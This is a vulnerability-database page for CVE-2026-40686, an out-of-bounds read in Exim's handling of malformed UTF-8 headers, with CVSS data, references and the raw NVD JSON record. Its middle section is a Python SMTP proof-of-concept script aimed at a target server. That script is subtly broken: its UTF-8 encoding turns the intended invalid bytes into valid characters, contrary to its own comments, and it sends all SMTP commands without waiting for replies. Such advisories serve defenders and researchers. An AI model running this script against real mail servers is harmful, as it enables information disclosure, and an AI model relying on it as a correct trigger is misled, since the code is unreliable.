Security Vulnerability Report
CVE-2026-40686 CVSS 3.7 LOW

CVE-2026-40686

Published: 2026-04-30 22:16:26
Last Modified: 2026-05-01 17:44:16

Description

In Exim before 4.99.2, when utf8 operators are enabled, there is an out-of-bounds read if large UTF-8 trailing characters are present (malformed UTF-8 header data). Information might be divulged within an error message produced during handling of an unrelated e-mail message.

CVSS Details

CVSS Score: 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness: CWE-125 (Out-of-bounds Read)

The score above is the Secondary (CNA) metric. The NVD Primary metric in the raw record rates the same issue CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, base score 5.3 MEDIUM; the two vectors differ only in attack complexity (High vs. Low).

Configurations (Affected Products)

cpe:2.3:a:exim:exim:*:*:*:*:*:*:*:* - VULNERABLE
Exim < 4.99.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import socket
import sys

# PoC for CVE-2026-40686
# Sending malformed UTF-8 headers to trigger out-of-bounds read

def send_exploit(target_ip, target_port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        s.recv(1024)  # Receive banner

        # Construct payload with malformed UTF-8 trailing characters
        # Using a long sequence of invalid continuation bytes
        malformed_header = "Subject: " + "\x80" * 200 + "\r\n"
        payload = (
            "EHLO pwn.example.com\r\n"
            "MAIL FROM: <attacker@local>\r\n"
            "RCPT TO: <postmaster@local>\r\n"
            "DATA\r\n"
            "From: <attacker@local>\r\n"
            "To: <postmaster@local>\r\n"
            + malformed_header +
            "\r\n"
            "Test body\r\n"
            ".\r\n"
            "QUIT\r\n"
        )
        s.send(payload.encode('utf-8'))
        response = s.recv(4096)
        print("[*] Payload sent.")
        print("[*] Response from server:")
        print(response.decode('utf-8', errors='ignore'))
        s.close()
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Usage: python script.py <target_ip> <port>
    if len(sys.argv) > 2:
        send_exploit(sys.argv[1], int(sys.argv[2]))
    else:
        send_exploit("127.0.0.1", 25)

References

Patch: https://code.exim.org/exim/exim/commit/f2570bde16fb4d4a1242ff363a4c4eecf6372efc
Vendor Advisory: https://exim.org/static/doc/security/cve-2026-04.1/CVE2026-40686.assessment
Mailing List / Third Party Advisory: https://www.openwall.com/lists/oss-security/2026/04/30/21
Broken Link (as tagged in the record): https://exim.org/static/doc/security/CVE-2026-40686.txt
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40686",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T22:16:25.787",
    "lastModified": "2026-05-01T17:44:15.677",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Exim before 4.99.2, when utf8 operators are enabled, there is an out-of-bounds read if large UTF-8 trailing characters are present (malformed UTF-8 header data). Information might be divulged within an error message produced during handling of an unrelated e-mail message."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-125" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:exim:exim:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.99.2",
                "matchCriteriaId": "E48EAA99-95DA-4695-BBEA-16D09AA0A508"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://code.exim.org/exim/exim/commit/f2570bde16fb4d4a1242ff363a4c4eecf6372efc",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://exim.org/static/doc/security/CVE-2026-40686.txt",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://exim.org/static/doc/security/cve-2026-04.1/CVE2026-40686.assessment",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.openwall.com/lists/oss-security/2026/04/30/21",
        "source": "[email protected]",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}